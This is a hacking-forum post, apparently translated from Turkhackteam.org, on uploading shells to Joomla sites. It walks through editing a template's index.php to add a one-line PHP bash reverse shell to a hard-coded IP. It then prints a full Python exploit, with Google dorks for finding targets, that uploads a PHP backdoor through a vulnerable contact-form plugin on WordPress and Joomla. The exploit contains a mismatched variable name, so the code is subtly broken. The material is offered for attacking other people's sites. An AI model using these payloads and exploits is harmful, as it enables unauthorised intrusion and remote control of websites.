Joomla Shell Upload

Hunter5x

Üye
21 Kas 2021
164
66
Birmingham
Joomla Shell Upload

Hello. In this article I will talk about shell uploading to Joomla and its basic logic. There are lot of methods of uploading shell to Joomla. We'll learn all of them.

Translated From: https://www.turkhackteam.org/konular/joomla-siteye-shell-atma.2014182/


What Is Joomla?

Joomla is an awarded open source CMS (Content Management System) which is designed to create websites and online apps.

It allows you to publish all kinds of documents such as text, images, pdf, video and audio files from anywhere with internet access, whenever you want, without requiring any technical skills.
It is written with PHP and uses the MySQL database to store your content. Its biggest competitor is WordPress, which is a free software. More than 3% of all websites worldwide are built with Joomla.

Now let's move on to our topic.

Log into the website whose admin login details has been founded by you from /administrator/ . Login panels are usually located at this address.

ggcml1e.jpg


After our login, this screen will show up.


1t81c4m.jpg


It says there is a mistake but It does not pretend us from doing something.

pthmo2p.jpg



From the top dropdown menu, click extensions > templates > templates.


j91cd0u.jpg


A lot of directory from our target website will be shown. Edit index.php from these directories.
By uploading our shell codes to this directory, we'll upload shell. I have given index.php as an example, you can upload your shell into the directory you want.
But we'll to start a reverse shell here.
Let's continue.

It is required to edit one of PHP files and save this template and run it to start our reverse shell. Edit index.php, add reverse shell code into it and start netcat listener.

armcjvi.jpg



PHP:
<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.181/444 0>&1' ");

?>

Click on the green "Save" button. Shell can now start, if it does not, click on "Template Preview".


p3eychp.jpg


And now we've got a reverse shell in Joomla. As you can see, both WordPress and Joomla have the same method to get reverse shell. Both of these examples were using reverse shell with one line, but pentestmonkey has got a reverse shell tool which is more complex or maybe even better for PHP that can be found here.

By this, you can upload or inject your malware or shell.

You don't have to use reverse shell method but I wanted to tell this method to you because It is not only beneficial but also efficient.

In normal methods you should go to index.php directory or whichever directory you want, then upload and save shell codes.

Then you can do whatever you want via shell.

Let me five this exploit to you which uploads shell automatically to both WordPress and Joomla websites.

You can use it if you wish, you will definitely see its benefits.

Python:
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#               Wordpress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Ghost Killer
#
# Exploit written by Ghost Killer
#
# Dork google wordpress:  inurl:inurl:ghost-contact-form
# Dork google joomla   :  inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header
def create_body_sh3ll_upl04d(payloadname):

   getfields = dict()

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """


                                                                        
                `---'                                                                         
                                                                                              

                                                     Cr3ative C0nt4ct Form Sh3ll Upl04d

                                     Discovered by:
                                    
                                       Ghost Killer - Anka Red Team

                                      Written by:

                                       Ghost Killer - Anka Red Team

                                 https://www.TurkHackTeam.ORG

                                       [email protected]

                            
                                    https://www.TurkHackTeam.ORG
                  
"""

commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cms', action="store",
                  help="Insert CMS Type: wordpress|joomla",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file or not options.cms:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms

print(banner)

if options.cms == "wordpress":
   url_sexy_upload = host+'/wp-content/plugins/ghost-contact-form/includes/fileupload/index.php'
   backdoor_location = host+'/wp-content/plugins/ghost-contact-form/includes/fileupload/files/'

elif options.cms == "joomla":
   url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
   backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

else:
   print("[X] -c options require: 'wordpress' or 'joomla'")
   sys.exit(1)

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

bodyupload = create_body_sh3ll_upl04d(payloadname)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
   req = urllib2.Request(url_ghost_upload, bodyupload, headers)
   response = urllib2.urlopen(req)

   if "error" in response.read():
      print("[X] Upload Failed :(")
   else:
      print("[!] Shell Uploaded")
      print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e.code))

Thanks for reading, have a nice day.

Special Thanks To @Ghost Killer.




 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.